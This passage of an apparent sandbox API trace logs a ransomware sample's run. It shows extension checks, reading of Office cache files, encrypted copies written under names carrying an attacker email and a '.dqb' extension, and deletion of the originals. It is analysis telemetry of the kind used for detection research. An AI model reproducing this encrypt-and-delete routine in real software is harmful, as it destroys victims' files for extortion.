Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.229] lstrlenW (lpString=".zip") returned 4 [0035.229] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.229] lstrlenW (lpString=".rar") returned 4 [0035.229] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString=".bz2") returned 4 [0035.229] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString=".7z") returned 3 [0035.229] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.229] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.229] lstrlenW (lpString=".dbf") returned 4 [0035.229] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.229] lstrlenW (lpString=".1cd") returned 4 [0035.229] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.229] lstrlenW (lpString=".jpg") returned 4 [0035.229] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.229] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.229] lstrlenW (lpString=".doc") returned 4 [0035.229] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString=".docx") returned 5 [0035.229] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.229] lstrlenW (lpString=".pdf") returned 4 [0035.229] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString=".xls") returned 4 [0035.229] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.229] lstrlenW (lpString=".xlsx") returned 5 [0035.229] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.229] lstrlenW (lpString=".ppt") returned 4 [0035.229] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.230] lstrlenW (lpString=".zip") returned 4 [0035.230] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.230] lstrlenW (lpString=".rar") returned 4 [0035.230] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.230] lstrlenW (lpString=".bz2") returned 4 [0035.230] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.230] lstrlenW (lpString=".7z") returned 3 [0035.230] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.230] lstrlenW (lpString=".dbf") returned 4 [0035.230] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.230] lstrlenW (lpString=".1cd") returned 4 [0035.230] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.230] lstrlenW (lpString=".jpg") returned 4 [0035.230] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.230] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.230] lstrlenW (lpString="OfficeMUI.xml") returned 13 [0035.230] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.230] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=5557) returned 1 [0035.230] CloseHandle (hObject=0x1a4) returned 1 [0035.230] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020 [0035.231] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.231] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.231] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.231] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.231] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.231] GetLastError () returned 0x0 [0035.231] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x15b5, lpOverlapped=0x0) returned 1 [0035.246] WriteFile (in: hFile=0x170, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0035.247] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.247] WriteFile (in: hFile=0x170, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.247] SetEndOfFile (hFile=0x170) returned 1 [0035.247] CloseHandle (hObject=0x170) returned 1 [0035.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.248] SetEndOfFile (hFile=0x1a4) returned 1 [0035.249] CloseHandle (hObject=0x1a4) returned 1 [0035.249] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.249] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0035.249] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.249] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.249] lstrlenW (lpString=".doc") returned 4 [0035.250] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString=".docx") returned 5 [0035.250] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.250] lstrlenW (lpString=".pdf") returned 4 [0035.250] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString=".xls") returned 4 [0035.250] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString=".xlsx") returned 5 [0035.250] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.250] lstrlenW (lpString=".ppt") returned 4 [0035.250] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.250] lstrlenW (lpString=".zip") returned 4 [0035.250] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.250] lstrlenW (lpString=".rar") returned 4 [0035.250] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString=".bz2") returned 4 [0035.250] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString=".7z") returned 3 [0035.250] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.250] lstrlenW (lpString=".dbf") returned 4 [0035.250] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.250] lstrlenW (lpString=".1cd") returned 4 [0035.250] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.250] lstrlenW (lpString=".jpg") returned 4 [0035.250] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.250] lstrlenW (lpString=".doc") returned 4 [0035.250] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.250] lstrlenW (lpString=".docx") returned 5 [0035.250] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.251] lstrlenW (lpString=".pdf") returned 4 [0035.251] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString=".xls") returned 4 [0035.251] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString=".xlsx") returned 5 [0035.251] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.251] lstrlenW (lpString=".ppt") returned 4 [0035.251] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.251] lstrlenW (lpString=".zip") returned 4 [0035.251] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.251] lstrlenW (lpString=".rar") returned 4 [0035.251] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString=".bz2") returned 4 [0035.251] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString=".7z") returned 3 [0035.251] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.251] lstrlenW (lpString=".dbf") returned 4 [0035.251] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.251] lstrlenW (lpString=".1cd") returned 4 [0035.251] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0035.251] lstrlenW (lpString=".jpg") returned 4 [0035.251] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.251] lstrcmpiW (lpString1=".chm", lpString2=".dqb") returned -1 [0035.251] lstrlenW (lpString="pss10r.chm") returned 10 [0035.251] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.320] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=27195) returned 1 [0035.320] CloseHandle (hObject=0x188) returned 1 [0035.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020 [0035.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.320] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.320] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.320] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.320] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.321] GetLastError () returned 0x0 [0035.321] ReadFile (in: hFile=0x188, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0035.365] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0035.366] ReadFile (in: hFile=0x188, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.366] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0035.366] SetEndOfFile (hFile=0x1a0) returned 1 [0035.366] CloseHandle (hObject=0x1a0) returned 1 [0035.367] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.367] SetEndOfFile (hFile=0x188) returned 1 [0035.368] CloseHandle (hObject=0x188) returned 1 [0035.368] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.369] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1 [0035.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.369] lstrlenW (lpString=".doc") returned 4 [0035.369] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString=".docx") returned 5 [0035.369] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0035.369] lstrlenW (lpString=".pdf") returned 4 [0035.369] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString=".xls") returned 4 [0035.369] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString=".xlsx") returned 5 [0035.369] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0035.369] lstrlenW (lpString=".ppt") returned 4 [0035.369] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.369] lstrlenW (lpString=".zip") returned 4 [0035.369] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString=".rar") returned 4 [0035.369] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString=".bz2") returned 4 [0035.369] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0035.369] lstrlenW (lpString=".7z") returned 3 [0035.369] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0035.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.369] lstrlenW (lpString=".dbf") returned 4 [0035.369] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0035.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.369] lstrlenW (lpString=".1cd") returned 4 [0035.370] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString=".jpg") returned 4 [0035.370] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString=".doc") returned 4 [0035.370] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString=".docx") returned 5 [0035.370] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0035.370] lstrlenW (lpString=".pdf") returned 4 [0035.370] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString=".xls") returned 4 [0035.370] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString=".xlsx") returned 5 [0035.370] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0035.370] lstrlenW (lpString=".ppt") returned 4 [0035.370] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString=".zip") returned 4 [0035.370] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString=".rar") returned 4 [0035.370] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString=".bz2") returned 4 [0035.370] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0035.370] lstrlenW (lpString=".7z") returned 3 [0035.370] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString=".dbf") returned 4 [0035.370] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString=".1cd") returned 4 [0035.370] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0035.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0035.370] lstrlenW (lpString=".jpg") returned 4 [0035.371] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0035.371] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.371] lstrlenW (lpString="branding.xml") returned 12 [0035.371] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.814] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=596341) returned 1 [0035.814] CloseHandle (hObject=0x1a0) returned 1 [0035.814] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020 [0035.815] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.815] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.815] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.815] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.815] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.815] GetLastError () returned 0x0 [0035.815] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x91975, lpOverlapped=0x0) returned 1 [0035.827] WriteFile (in: hFile=0x170, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0035.836] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.837] WriteFile (in: hFile=0x170, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.837] SetEndOfFile (hFile=0x170) returned 1 [0035.837] CloseHandle (hObject=0x170) returned 1 [0035.842] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.842] SetEndOfFile (hFile=0x1a0) returned 1 [0035.847] CloseHandle (hObject=0x1a0) returned 1 [0035.847] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.847] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0035.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.847] lstrlenW (lpString=".doc") returned 4 [0035.847] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.847] lstrlenW (lpString=".docx") returned 5 [0035.847] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.847] lstrlenW (lpString=".pdf") returned 4 [0035.847] lstrcmpiW 